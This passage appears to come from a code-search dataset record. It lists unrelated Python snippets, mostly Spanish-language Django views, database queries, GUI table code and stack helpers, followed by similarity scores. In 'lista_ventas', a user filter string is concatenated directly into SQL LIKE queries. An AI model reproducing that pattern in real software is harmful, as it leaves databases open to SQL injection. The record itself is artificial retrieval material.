particle(lieu):\r\n\r\n path = \"https://air.plumelabs.com/fr/live/{}\".format(lieu)\r\n request_html = requests.get(path)\r\n page = request_html.content\r\n soup = BeautifulSoup(page, \"html.parser\")\r\n\r\n liste = []\r\n propriete = soup.find_all(\"div\")\r\n for i in propriete:\r\n liste.append(i.get_text())\r\n\r\n\r\n liste_e = liste[20:21]\r\n pollute = liste_e[0][31:34]\r\n\r\n return pollute", "def test_match_elementos_BD(self):\n respuesta = self.client.get(self.response)\n\n for i in respuesta.data:\n # print(i)\n v = Musica.objects.get(id=i[\"id\"])\n self.assertEqual(i[\"artista\"], v.artista)\n self.assertEqual(i[\"owner\"], v.owner.username)\n # 
print(Musica.objects.filter(id=i['id']).count())", "def __init__(self,obj):\n self.nature_libelle = obj['NatureLibelle']\n self.ins_nom = obj['InsNom']\n self.ins_numero_install = obj['InsNumeroInstall']\n self.equipement_id = obj['EquipementId']", "def lista_ventas(self,tipo,lista,filtro):\n self.lista=self.builder.get_object(lista)\n self.lista.clear()#Limpia la lista\n busqueda = \"\"\n\n if tipo==\"\":\n print(\"Llego a buscar ventas en BD\")\n #result=self.db.execute('SELECT * FROM Venta')\n busqueda = self.db.execute('SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID')\n elif tipo == \"Cliente\":\n print(\"Busco venta por nombre del cliente\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND C.nombre LIKE '%\"+filtro+\"%'\")\n elif tipo == \"Viaje\":\n print(\"Busco venta por nombre del paquete\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND P.nombre LIKE '%\"+filtro+\"%'\")\n elif tipo == \"Fecha de inicio\":\n print(\"Busco venta por fecha de inicio\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND fechaInicio LIKE '%\"+filtro+\"%'\")\n elif tipo == \"Fecha de fin\":\n print(\"Busco venta por fecha de fin\")\n busqueda = self.db.execute(\"SELECT ventaID ,fechaVenta, fechaInicio, fechaFin, C.nombre, P.nombre FROM Cliente C, Paquete P, Venta V WHERE V.IdCli = C.clienteID AND V.IdPaq = P.paqueteID AND fechaFin LIKE '%\"+filtro+\"%'\")\n \n for row in busqueda: \n #Empieza por la [1] porque el ID es la [0]\n # self.lista.append([row[4],row[5],row[1],row[2],row[3]])\n self.lista.append([row[1],row[2],row[3],row[4],row[5],row[0]])\n print(\"Listo ventas en tabla\")", "def apilar(pila, dato):\n pila.cima += 1\n pila.datos[pila.cima] = dato", "def getIntervenciones():", "def PolonaScan(title:str):\n e_id = PolonaGetFirst(title)\n\n #Get data of an entity\n URL='https://polona.pl/api/entities/'+e_id+'/'\n\n r = requests.get(URL,None)\n data = r.json()\n\n scanlist = list()\n for i in data['scans']:\n scanlist.append(str(i['resources'][0]['url']))\n \n return scanlist", "def object(self):", "def cima(pila):\n return pila.datos[pila.tope]", "def listar_atributos(request,idAtributoTI,id_item,ver = None):\n print('el id del item es :',id_item)\n atributos = Atributo_Item.objects.filter(id_item=id_item) #obtiene los valores del atributo del item\n TI=TipoItem.objects.get(id_ti=idAtributoTI) #obtiene el tipo de item\n atributo= Atributo.objects.filter(ti=TI) #lista los atributos del tipo de item\n itemActual=Item.objects.get(id_item=id_item) #el item a ser modificado\n if(request.method=='POST'):\n if request.method == 'POST':\n ''' obtengo el item viejo (itemActual) y actualizo sus valores de boolean a false.'''\n itemActual.actual=False\n itemActual.save()\n '''Ahora en estas variables voy a obtener los valores editados de mi ITEM '''\n nombre_item_editado = request.POST.get('item_nombre')\n descripcion_item_editado = request.POST.get('item_descripcion')\n estado_item_editado = request.POST.get('item_estado')\n costo_item_editado = 
request.POST.get('item_costo')\n print('nombre es:',nombre_item_editado)\n ''' crear un nuevo item, con un nuevo id con los valores recibidos del form'''\n item_editado = Item(nombre=nombre_item_editado,descripcion=descripcion_item_editado,costo=costo_item_editado,\n actual=True,estado=itemActual.estado,fase_id=TI.fase_id,ti_id=TI.id_ti)\n item_editado.save()\n\n ''' Crear un nuevo registro en la tabla versiones con los valores correspondientes del id_padre y version'''\n version_item_actual= Versiones.objects.get(id_item=itemActual.id_item) #obtengo el registro del item actual\n varsion_item_editado = Versiones(id_item=item_editado.id_item, id_padre= version_item_actual.id_padre,\n id_Version=version_item_actual.id_Version+1)\n varsion_item_editado.save()\n\n diccionario_data = verificar_datos_form_atributo_item(request,TI.id_ti,atributo,request.POST,request.FILES)\n print('el diccionario data es: ',diccionario_data)\n for data in diccionario_data:\n if(data['AtributoTI'].tipo_dato=='File'): #si es de tipo File ,entonces armo la ruta para subir el archivo\n if(data['valor_atributo_item'] != 'Sin archivos adjuntos' and data['valor_atributo_item'] != 'Archivo Elminado' ): # si se recibe algo es porque el edito el archivo, por lo tanto creamos una nueva ruta en la nube\n ruta = str(TI.fase.id_Proyecto.id_proyecto) + \"/\" + str(item_editado.id_item)\n doc = data['valor_atributo_item']\n PATH = f'/{ruta}/{doc[0]}'\n ''' proceso de subir archivo a dropbox'''\n SubirArchivo(doc[0], PATH)\n print('-----',PATH)\n ##se sube archivo a dropbox en segundo plano\n t2 = Thread(\n target=SubirArchivo,\n args=(doc[0], PATH),\n )\n t2.start()\n atributo_item_editado = Atributo_Item(idAtributoTI=data['AtributoTI'], id_item=item_editado,\n valor=PATH)\n atributo_item_editado.save()\n elif(data['valor_atributo_item'] == 'Archivo Elminado'):\n atributo_item_editado = Atributo_Item(idAtributoTI=data['AtributoTI'],\n id_item=item_editado,\n valor='Sin archivos adjuntos')\n atributo_item_editado.save()\n else:\n atributo_item_editado = Atributo_Item(idAtributoTI=data['AtributoTI'], id_item=item_editado,\n valor=Atributo_Item.objects.get(id_item=itemActual,idAtributoTI=data['AtributoTI']).valor)\n print('el editado sin modificar',atributo_item_editado.valor)\n atributo_item_editado.save()\n else:\n print('atributo_id:',data['AtributoTI'].id_atributo,' valor:',data['valor_atributo_item'])\n atributo_item_editado=Atributo_Item(idAtributoTI=data['AtributoTI'], id_item=item_editado,\n valor=data['valor_atributo_item'])\n atributo_item_editado.save()\n '''aca se actulizan las relaciones del item'''\n itemActual_inicio=Relacion.objects.filter(inicio_item=itemActual.id_item) #obtengo todos los items en donde el es el origen\n for relacion in itemActual_inicio:\n nueva_relacion=Relacion(inicio_item=item_editado.id_item,fin_item=relacion.fin_item)\n nueva_relacion.save()\n\n itemActual_fin = Relacion.objects.filter(fin_item=itemActual.id_item) # obtengo todos los items en donde el es el fin\n for relacion in itemActual_fin:\n nueva_relacion = Relacion(inicio_item=relacion.inicio_item, fin_item=item_editado.id_item)\n nueva_relacion.save()\n\n return redirect('gestion:detallesFase',TI.fase_id)\n\n\n context = {\n \"atributos\":atributos,\n \"atributo\":atributo,\n 'proyectos': itemActual.fase.id_Proyecto,\n 'item':itemActual,\n 'true':True,\n 'false':False,\n 'ver':ver\n }\n return render(request, 'items/listar_atributos.html', context)", "def __init__(self, diccionario):\n self.numero = diccionario['numero']\n self.nombre 
= diccionario['equipo_nombre']\n self.pokmov = lectores.pokemon_y_movimiento_a_tuplas(diccionario)", "def PolonaGetFirst(title:str):\n URL='https://polona.pl/api/entities/'\n PARAMS={'query':title, 'size':'1', 'public':'1'}\n\n r = requests.get(URL, PARAMS)\n data = r.json()\n e_id = data['hits'][0]['id']\n return e_id", "def __init__(self):\n self.modelo = [\"A\", \"sucio\", \"sucio\",\"sucio\", \"sucio\",\"sucio\", \"sucio\"]", "def listar_gabarito():\n return GabaritoProva.listar(gabarito)", "def buscar(self, *args):\n texto = self.get_text()\n campos = self.modelo._meta.fields\n query = Q()\n for c in campos:\n if not isinstance(c, fields.related.ForeignKey):\n field = c.name\n q = Q(**{\"%s__icontains\" % field : texto})\n query = query | q\n elementos = self.modelo.objects.filter(query)\n if len(elementos) == 1:\n self.objeto = elementos[0]\n self.set_text(self.objeto.__str__())\n self.id = self.objeto.id\n self.modify_base(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"#FFFFFF\"))\n else:\n self.busqueda = Busqueda(self, texto)\n self.busqueda.connect('usar', self.usar)", "def obtenerObra(self):\n rowActual = self.tableOs.currentItem().row()\n self.lineRazon.setText(str(self.tableOs.item(rowActual,0).text()))\n self.lineRazon.setEnabled(False)\n self.obraSocial=str(self.tableOs.item(rowActual,0).text())\n self.lineCuit.setText(str(self.tableOs.item(rowActual,1).text()))\n self.lineCuit.setEnabled(False)\n self.tableOs.setEnabled(False)\n self.gbFactura.setEnabled(True)\n self.gbNotaCredito.setEnabled(True)", "def get_object(id):", "def __str__(self):\n return self.idLancamentosPagar", "def GetDataAsObject(self):", "def __init__(self):\n self.enfila= 0\n self.fila = []", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def __iter__(self):\n ids_productos = self.carro.keys()\n #obtiene los objetos producto y los agrega al carro\n productos = Producto.objects.filter(id__in=ids_productos)\n for producto in productos:\n self.carro[str(producto.id)]['producto'] = producto\n\n for item in self.carro.values():\n item['precio']=Decimal(item['precio'])\n item['precio_total'] = item['precio']*item['cantidad']\n yield item", "def apiEditar():\n response.view = 'generic.json'\n\n def GET(*args, **vars):\n # if not request.env.request_method == 'GET': raise HTTP(403)\n # proveedores = db().select(db.proveedor.ALL).as_list()\n return dict()\n\n def POST(*args, **vars):\n # raise HTTP(403)\n pieza = vars[\"pieza\"]\n proveedores_list = vars[\"proveedores_list\"]\n respuesta = \"ok\"\n idProveedor = 0\n\n fechaIn = pieza[\"fechaIn\"].split('/')\n fechaString = fechaIn[2] + '-' + fechaIn[1] + '-' + fechaIn[0]\n\n pieza_data = dict(codigo=pieza[\"codigo\"], nombre=pieza[\"nombre\"],\n descripcion=pieza[\"descripcion\"], cantidad=pieza[\"cantidad\"],\n unidad=pieza[\"unidad\"], precio_entrada=pieza[\"precioIn\"],\n precio_salida=pieza[\"precioOut\"], fecha_entrada=fechaString)\n\n # Verificar si aumento la cantidad. 
Para asi dar nueva entrada\n cantidad_antigua = db.pieza(pieza[\"id\"]).cantidad\n cantidad_nueva = int(pieza[\"cantidad\"]) - cantidad_antigua if cantidad_antigua < int(\n pieza[\"cantidad\"]) else int(pieza[\"cantidad\"])\n\n registrar_entrada = cantidad_antigua != int(pieza[\"cantidad\"]) and cantidad_nueva != 0\n\n if registrar_entrada:\n id_pieza_entrada = db.pieza_entrada.insert(codigo=pieza[\"codigo\"], nombre=pieza[\"nombre\"],\n descripcion=pieza[\"descripcion\"], cantidad=cantidad_nueva,\n unidad=pieza[\"unidad\"], precio_entrada=pieza[\"precioIn\"],\n precio_salida=pieza[\"precioOut\"], fecha_entrada=datetime.datetime.now().date())\n\n for prov in proveedores_list:\n db.proveedor_entrada.insert(\n id_pieza_entrada=id_pieza_entrada, nombre=prov[\"nombre\"], descripcion=prov[\"descripcion\"],\n direccion=prov[\"direccion\"], telefono=prov[\"telefono\"])\n\n # Actualizo la pieza\n try:\n db(db.pieza.id == pieza[\"id\"]).update(**pieza_data)\n db(db.pieza_proveedor.id_pieza == pieza[\"id\"]).delete()\n\n for prov in proveedores_list:\n db.pieza_proveedor.insert(\n id_pieza=pieza[\"id\"], id_proveedor=prov[\"id\"])\n\n except Exception:\n respuesta = \"error\"\n\n return dict(respuesta=respuesta)\n # return dict(proveedor=proveedor)\n\n return locals()", "def __init__(self):\n self.tours = []\n self.grille = Grille()", "def valor(self):\n try:\n objeto = self.objeto\n except AttributeError:\n objeto = None\n return objeto", "def obtener_productos():\n\n # Se crea la lista de objetos Producto()\n productos = [\n Producto(\"Caja chica\", 5, 100.0),\n Producto(\"Caja mediana\", 3, 185.0),\n Producto(\"Caja grande\", 1, 299.0)\n ]\n\n return productos", "def listar_tipo_item(request,id_proyecto):\n fases=Fase.objects.filter(id_Proyecto_id=id_proyecto)\n proyectos=Proyecto.objects.get(id_proyecto=id_proyecto)\n tipoItem=[]\n\n for fase in fases:\n tipoItem += [{ 'fase':fase,\n 'ti':TipoItem.objects.filter(fase_id=fase.id_Fase)\n }]\n\n print(tipoItem)\n contexto={\n 'proyectos':Proyecto.objects.get(id_proyecto=id_proyecto),\n 'TipoItem':tipoItem\n }\n return render (request,'proyectos/listarTipoItem.html',contexto)", "def get(id):\n elements = Advertisements().get_one_element(id)\n data = jsonify(elements)\n if data is None:\n return abort(500, \"L'élément n'existe pas.\")\n else:\n data.statut_code = 200\n return data", "def __init__(self, nombre, socios):\n self.__nombre = nombre\n self.__socios = socios\n self.__resultados = {'p1': '', 'p2': '', 'p3': '', 'p4': '', 'p5': '', 'p6': '', 'p7': ''}", "def retrieve(self, request, pk=None,format=None):\n curso = get_object_or_404(Curso, pk=pk)\n turmas = Turma.objects.all().filter(curso=curso)\n serializer = TurmaSerialiser(turmas,many=True)\n return Response(serializer.data)", "def list_gemeente_adapter(obj, request):\n return {\n 'id': obj.id,\n 'niscode': obj.niscode,\n 'naam': obj.naam\n }", "def test_generate_single_element_get(self):\n pass", "def presenetCar():", "def objects(self):", "def ListaDeAlumnosAPI(request):\n if request.method == 'GET':\n alumnos = Alumno.objects.all()\n serializer = AlumnoSerializer(alumnos, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = AlumnoSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)", "def retrieve(self):\n pass", "def cargarProductosSinObra(self):\n\n 
self.limpiarTabla(self.tableProductos)\n\n ##Cnsulta para obtener todos los productos del sistema, con su correspondiente\n ##codigo de barra, monodroga, descuento, importe\n query=self.sesion.query(ProductoModel.codigo_barra,ProductoModel.id_medicamento,ProductoModel.id_presentacion,MonodrogaModel.nombre,ProductoModel.importe).\\\n join(MedicamentoModel).filter(ProductoModel.id_medicamento==MedicamentoModel.nombre_comercial).\\\n join(MonodrogaModel).filter(MedicamentoModel.id_monodroga==MonodrogaModel.nombre).\\\n filter(ProductoModel.baja==False).order_by(ProductoModel.codigo_barra)\n\n ##Se cargan los datos obtenidos en la tabla de Producto\n for n, obj in enumerate(query):\n self.tableProductos.insertRow(n)\n self.tableProductos.setItem(n, 0, QtGui.QTableWidgetItem(str(obj[0])))\n self.tableProductos.setItem(n, 1, QtGui.QTableWidgetItem(str(obj[1])))\n self.tableProductos.setItem(n, 2, QtGui.QTableWidgetItem(str(obj[2])))\n self.tableProductos.setItem(n, 3, QtGui.QTableWidgetItem(str(obj[3])))\n self.tableProductos.setItem(n, 4, QtGui.QTableWidgetItem(str(0)))\n self.tableProductos.setItem(n, 5, QtGui.QTableWidgetItem(str(obj[4])))\n\n ##Se carga la cantidad de cada producto en la tabla\n for row,producto in enumerate(ProductoModel.buscarTodos(ProductoModel.codigo_barra,self.sesion)):\n self.tableProductos.setItem(row,6,QtGui.QTableWidgetItem(str(producto.getCantidad(self.sesion))))", "def eksport(lista):\n # wynik - lista zawierajaca wynik koncowy dzialania funkcji(lata i wartosci dla poszczegolnych panstw)\n wynik = []\n for panstwo in lista:\n # rok - lista zawierajaca lata\n # wartosc - lista zawierajaca wartosci dla lat\n rok = []\n wartosc = []\n for element in panstwo:\n # sprawdzenie czy klucz posiada odpowiednia wartosc\n if element[1].get('key') == \"NE.EXP.GNFS.CD\":\n # dodanie roku do listy\n rok.append(int(element[2].text))\n # rozpatrywanie przypadku w ktorym wartosc jest None\n if element[3].text is None:\n wartosc.append(element[3].text)\n else:\n wartosc.append(float(element[3].text))\n # dodawanie list dla poszczegolnych panstw do listy wynikowej\n wynik.append(rok)\n wynik.append(wartosc)\n\n return wynik", "def scrape_carteleraVIEJA(data, comp_nom):\t\n\t\n\tfunciones = []\n\tsoup = BeautifulSoup(data, convertEntities=BeautifulStoneSoup.HTML_ENTITIES)\n\tshow_exp = re.compile(r'sid=(\\d+)')\n\t\n\tcomplejo_org = Complejo.objects.get(nombre=comp_nom)\n\t\n\t#Busca complejo platino... en caso de existir:\n\tcomplejo_platino = complejo_org\n\t\n\t\n\tpeliculas = soup.find('table', cellspacing='0', cellpadding='0', border='0').contents[3:-1:2]\n\t\n\tfor peli in peliculas:\n\t\ttres_D = False\n\t\tidioma = None\n\t\t\n\t\t#Checar tiene logo de 3d\n\t\tif peli.find('div', 'icono_platino').find('img', src=re.compile(r'3d.png$')): tres_D = True\n\t\t\n\t\t#Encabezado contiene titulo e idioma\n\t\tencabezado = peli.find('li', 'texto_3', style='margin: 2px 0px 0px; float: left; width: 155px;')\n\t\ttitulo = ''.join(encabezado.findAll(text=True)).replace('\\n', '').strip()\n\t\t\n\t\t\n\t\t#Determina Idioma\n\t\tif encabezado.find('img', alt='idioma').get('src', '').find('ing') > 0:\n\t\t\tidioma = 'ingles'\n\t\telse:\n\t\t\tidioma = 'espanol'\n\t\t\n\t\ttit = '|'+ titulo + '|'\n\t\t#Buscar pelicula por titulo segun idioma y 3d.. 
subtitulada o no.\n\t\tpeli_query = Pelicula.objects.filter(alt_tit__icontains=tit, tres_D=tres_D)\n\t\tif len(peli_query) > 1:\n\t\t\t#Si idioma == ingles, selecciona la pelicula subtitulada\n\t\t\tpelicula = peli_query.filter(subtitulada= (idioma == 'ingles') )\n\t\telif len(peli_query) == 1:\n\t\t\tpelicula = peli_query[0]\n\t\telse:\n\t\t\tlogger.debug( \"No se encontro pelicula %s\" % titulo\t\t)\n\t\t\t\n\t\thoras_html = peli.find('div', id='horax')\n\t\tplatino_b= False\t\t\n\t\tfor tag in horas_html.contents:\n\t\t\t#Me salto todo lo que no es html\n\t\t\tif type(tag) != NavigableString:\t\t\n\t\t\t\t#En caso de que sea funciones de platino\n\t\t\t\tif tag.name == 'center':\n\t\t\t\t\tplatino_b = True\n\t\t\t\t\tfuncion_name = ''.join(tag.findAll(text=True)).strip()\n\t\t\t\t\tif funcion_name.find('Platino') > -1:\n\t\t\t\t\t\t#Ajustar el complejo para platino\n\t\t\t\t\t\tcomplejo = complejo_platino\n\t\t\t\t\t\t\n\t\t\t\telif tag.get('style','').find('border-bottom: 1px solid rgb(238, 207, 0);') > -1:\n\t\t\t\t\t#Ajustar de regreso el complejo normal\n\t\t\t\t\tcomplejo = complejo_org\n\t\t\t\t\tplatino_b = False\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t#Si es renglon de hora y no algo mas como <br/>\t\t\t\n\t\t\t\tif tag.name== 'div' and tag.get('id','') == 'general':\n\t\t\t\t\tfecha = parseDate(tag.find('div', id=fecha).string)\n\t\t\t\t\tfunciones.extend(\n\t\t\t\t\t\t[{\n\t\t\t\t\t\t\t'pelicula': pelicula,\n\t\t\t\t\t\t\t'complejo': complejo,\n\t\t\t\t\t\t\t'hora': datetime.datetime(fecha.year, fecha.month, fecha.day, *time.strptime( hora_html.string , '%H:%M')[3:5]),\n\t\t\t\t\t\t\t'pol_idShowTime': show_exp.search(hora_html['href']).group(1),\n\t\t\t\t\t\t\t} for hora_html in tag.find('div', id='funciones').find('a', 'texto_1')]\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t)\n\t\t\t\t\t#logger.debug( funciones)\n\treturn funciones", "def traer_enfermedad(request):\n tipo_motivos = MotivosConsultas.objects.filter(id=request.GET['pk'])\n data = serializers.serialize('json', tipo_motivos, fields={'descripcion'})\n return HttpResponse(data, content_type='application/json')", "def AlumnoDetalleAPI(request, pk):\n try:\n alumno = Alumno.objects.get(pk=pk)\n except Alumno.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n if request.method == 'GET':\n serializer = AlumnoSerializer(alumno)\n return Response(serializer.data)\n\n elif request.method == 'PUT':\n serializer = AlumnoSerializer(alumno, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n elif request.method == 'DELETE':\n alumno.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)", "def __init__():\n self.placa = placa", "def carregarResponsavel(self, ide):\r\n try:\r\n self.__id = int(ide)\r\n self.cursor.execute(\"SELECT * FROM RESPONSAVEL WHERE ID = %s;\" %(self.__id))\r\n if self.cursor.rowcount == 1:\r\n return self.cursor.fetchone()\r\n else:\r\n return None\r\n except:\r\n return None", "def get_curso_inscripcion(request):\n if request.method == 'GET':\n serializer = CursoSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n if \"curso\" in serializer.validated_data:\n try:\n curso = Curso.nodes.get(nombre__icontains=serializer.validated_data[\"curso\"])\n resp = {\"nombre_curso\": curso.__dict__[\"nombre\"], \"link\": curso.__dict__[\"link\"]}\n return JsonResponse(resp, status=status.HTTP_200_OK)\n except Curso.DoesNotExist:\n print(\"Cant find (CURSO) \", 
serializer.validated_data[\"curso\"])\n return JsonResponse({\"error\": \"(CURSO) \" + serializer.validated_data[\"curso\"] + \" not found \"},\n status=status.HTTP_404_NOT_FOUND)\n if \"codigo\" in serializer.validated_data:\n try:\n curso = Curso.nodes.get(cod__icontains=serializer.validated_data[\"codigo\"])\n resp = {\"nombre_curso\": curso.__dict__[\"nombre\"], \"link\": curso.__dict__[\"link\"]}\n return JsonResponse(resp, status=status.HTTP_200_OK)\n except Curso.DoesNotExist:\n print(\"Cant find (CURSO) \", serializer.validated_data[\"codigo\"])\n return JsonResponse({\"error\": \"(CURSO) \" + serializer.validated_data[\"codigo\"] + \" not found \"},\n status=status.HTTP_404_NOT_FOUND)\n return JsonResponse(serializer.errors, status=status.HTTP_404_NOT_FOUND)", "def test_get_insumo(self):", "def test_buscar_por_sigla(self):\n ape1 = APE.objects.get(sigla=\"APX1\")\n ape2 = APE.buscar_por_sigla(\"APX1\")\n self.assertIsNotNone(ape1, \"El APE encontrado con GET no debería ser None\")\n self.assertIsNotNone(ape1, \"El APE encontrado con buscar_por_sigla no debería ser None\")\n self.assertEqual(ape1.sigla, ape2.sigla, \"Las siglas no son las mismas\")\n self.assertEqual(ape1.id, ape2.id, \"Los objetos no tienen los mismos ids\")", "def getById(self, id):\n try:\n c = self.conn.cursor()\n c.execute(\"SELECT * FROM Klient WHERE id=?\", (id,))\n inv_row = c.fetchone()\n klient = Klient(id=id, imie=inv_row[1], nazwisko=inv_row[2])\n if inv_row == None:\n klient=None\n else:\n klient.imie = inv_row[1]\n klient.nazwisko = inv_row[2]\n klient.ilosc = inv_row[3]\n c.execute(\"SELECT * FROM Lokaty WHERE klient_id=? order by nazwa\", (id,))\n inv_items_rows = c.fetchall()\n items_list = []\n for item_row in inv_items_rows:\n item = Lokata(nazwa=item_row[0], ilosc=item_row[1], oprocentowanie=item_row[2])\n items_list.append(item)\n klient.lokaty=items_list\n except Exception as e:\n #print \"klient getById error:\", e\n raise RepositoryException('error getting by id klient_id: %s' % str(id))\n return klient", "def test_listado(self):\n respuesta = self.client.get(self.response)\n self.assertEqual(200, respuesta.status_code)\n # print(self.response)\n # print(respuesta.data)", "def agg_listar_tipo_item(request,id_fase):\n\n fase_proyecto=Fase.objects.get(id_Fase=id_fase)\n proyecto=Proyecto.objects.get(id_proyecto=fase_proyecto.id_Proyecto.id_proyecto)\n\n if validar_permiso(request.user,\"is_gerente\",fase_proyecto.id_Proyecto) or request.user.has_perm('crear_item',proyecto) and validar_rol_fase('crear_item',fase_proyecto,request.user):\n print('tiene el permiso de crear_item')\n else:\n messages.error(request,\"NO SE POSEE EL PERMISO: crear_item\" + \" SOLICITE EL PERMISO CORRESPONDINTE PARA REALIZAR LA ACCION\")\n return redirect('gestion:detallesFase',fase_proyecto.id_Proyecto.id_proyecto)\n\n item_id=Item.objects.last()\n tipoItem = TipoItem.objects.filter(fase_id=id_fase)\n if(tipoItem.count() == 0):\n return HttpResponse(request,\"id de fase invalida\",status=400)\n\n if request.method == 'POST':\n x=request.POST.get('ti')\n item=Item.objects.last()\n tipoItem2 = TipoItem.objects.filter(nombre=x,fase_id=id_fase)\n print(tipoItem2)\n item.ti =tipoItem2[0]\n item.save()\n\n return redirect('gestion:aggAtributos',tipoItem2[0].id_ti)\n\n contexto={\n 'TipoItem':tipoItem,\n 'id_item':item_id.id_item\n }\n return render (request,'items/aggTI.html',contexto)", "def view(self):", "def query(self):", "def retirer_objet(self, nom_membre):\n membre = self.get_membre(nom_membre)\n objet = 
membre.tenu\n membre.tenu = None", "def uvozi_podatke(tabele):\n for t in tabele:\n t.uvozi()", "def get():", "def get():", "def Obtener_Lista(self):\n\t\treturn [self,self.Nombre+\" \"+self.Apellido,self.ID,self.Fecha, \n\t\tself.Edad,self.Test,self.Posicion,self.Prioridad,self.Progreso,self.Informe]", "def apilar(self, x):\n # Apilar es agregar al final de la lista.\n self.items.append(x)", "def __init__(self):\n mi_parqueo = list()", "def entrer(self):\n valeur = getattr(self.objet, self.attribut, None)\n if valeur is None:\n setattr(self.objet, self.attribut, [])", "def lista_offerte(request, legahash, astaid, numero=0):\n return lista_ultimi(request, legahash, astaid, Offerta, numero)", "def getObject(language=None):" ]
[ "0.60461986", "0.59805244", "0.59310794", "0.5646558", "0.5615027", "0.55744654", "0.5515526", "0.54436487", "0.5441662", "0.5441662", "0.54161835", "0.5410337", "0.5382265", "0.5358372", "0.53443366", "0.533257", "0.53211975", "0.53207725", "0.53205705", "0.53148395", "0.5314805", "0.5306073", "0.53059506", "0.53054386", "0.5296946", "0.52871656", "0.52854854", "0.5279527", "0.5273617", "0.5270526", "0.52677065", "0.5260744", "0.5260326", "0.525874", "0.52478606", "0.52429426", "0.5241005", "0.523606", "0.5226263", "0.5209008", "0.5197096", "0.5191959", "0.5191597", "0.5181888", "0.5162236", "0.51618314", "0.5159624", "0.51527685", "0.5143162", "0.5141274", "0.51330596", "0.51311195", "0.5128666", "0.512856", "0.51246554", "0.5112868", "0.5112868", "0.5112868", "0.5112868", "0.5112868", "0.5110996", "0.5106648", "0.5103515", "0.510114", "0.5099944", "0.509752", "0.5091084", "0.5089008", "0.50862306", "0.50603366", "0.50544196", "0.50509685", "0.50477564", "0.5034691", "0.5033437", "0.5031156", "0.5025442", "0.5025001", "0.50233954", "0.5018475", "0.50083655", "0.5004073", "0.4999509", "0.4981206", "0.4971638", "0.49657762", "0.49631628", "0.49573973", "0.49557543", "0.4953186", "0.495189", "0.49492344", "0.4941997", "0.4941997", "0.49378005", "0.49364358", "0.49340948", "0.49337396", "0.49336785", "0.49273163" ]
0.5313862
21
Pops the element at the top of the stack
def desapilar(pila):
    dato = pila.datos[pila.tope]
    pila.tope -= 1
    return dato
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def delete(self, *args, **kwargs):\n campo = Campostagimg.objects.filter(tag=self.tag, imagen=self.imagen)\n for c in campo:\n c.medidas = \"\"\n c.save()\n c.precision = 0\n c.save()\n c.v_esperado = \"\"\n c.save() \n\n super(Campos_defecto, self).delete(*args, **kwargs)", "def usar(self,letra):\n self.atril.remove(letra)", "def removeItem(self, valor):\n if not self.esta_vazia():\n ## Os dois ponteiros apontam pro primeiro elemento da lista\n elementoAnterior = self._cabeca\n elementoAtual = self._cabeca\n while True:\n ## Se o elemento for encontrado\n if elementoAtual._inteiro == valor:\n while elementoAtual._inteiro == valor:\n if elementoAtual == elementoAnterior:\n ## Se o elemento a ser removido é o primeiro\n self.removeInicio()\n elementoAnterior = self._cabeca\n elementoAtual = self._cabeca\n else:\n elementoAnterior._proximo = elementoAtual._proximo\n elementoAnterior._proximo._anterior = elementoAnterior\n elementoAtual = elementoAnterior._proximo\n if elementoAtual == self._cabeca:\n break\n break\n else:\n ## se o elemento não foi encontrado ainda\n if elementoAnterior != elementoAtual:\n ## Avança o ponteiro que marca o nó anterior apenas quando não é a primeira passagem\n ## do Loop (os dois ponteiros já estão diferentes)\n elementoAnterior = elementoAnterior._proximo\n ## de qualquer forma avança o ponteiro para o atual\n elementoAtual = elementoAtual._proximo\n ## Testar se o elemento buscado não existe\n if elementoAtual == self._cabeca:\n break\n return None", "def atender(self):\n\n if self.enfila>0: #Para que atiendan solamente si e que hay alguien en la fila\n\n self.enfila-=1\n self.fila.pop(0) #Saco primer elemento de la fila (Atienden al primer cliente)", "def eliminarDetalle(self):\n\n itemActual = self.tableFactura.currentItem()\n if itemActual == None:\n self.showMsjEstado(\"Debe seleccionar un item para dar de baja\")\n else:\n detalle = self.detallesTabla[itemActual.row()]\n for loteVenta in self.lotesVentas[detalle]:\n loteVenta[0].aumentarCantidad(loteVenta[1])\n loteVenta[0].modificar(self.sesion)\n detalle.eliminarLotesAsociados(self.sesion)\n detalle.bajaFisica(self.sesion)\n del self.lotesVentas[detalle]\n del self.data[itemActual.row()]\n self.tableFactura.hideRow(itemActual.row())\n self.actualizar()\n self.productosAgregados -=1\n self.objectModified.emit()", "def remove(self,producto):\n id_producto = str(producto.id)\n if id_producto in self.carro:\n del self.carro[id_producto]\n self.save()", "def __delitem__(self, i):\n if not (0 <= i < len(self)):\n raise IndexError(\"index en dehors de la plage admissible.\")\n\n if i == 0:\n self.supprimer_tete()\n return\n\n courante = self.tete\n\n for j in range(i - 1):\n courante = courante.suivante\n \n self._supprimer_apres(courante)", "def desaparecer(self,identificador_de_lista):\n self.mapa.delet_bomberman(identificador_de_lista)", "def elimnar_fila(self):\n button = self.sender()\n if button:\n row = 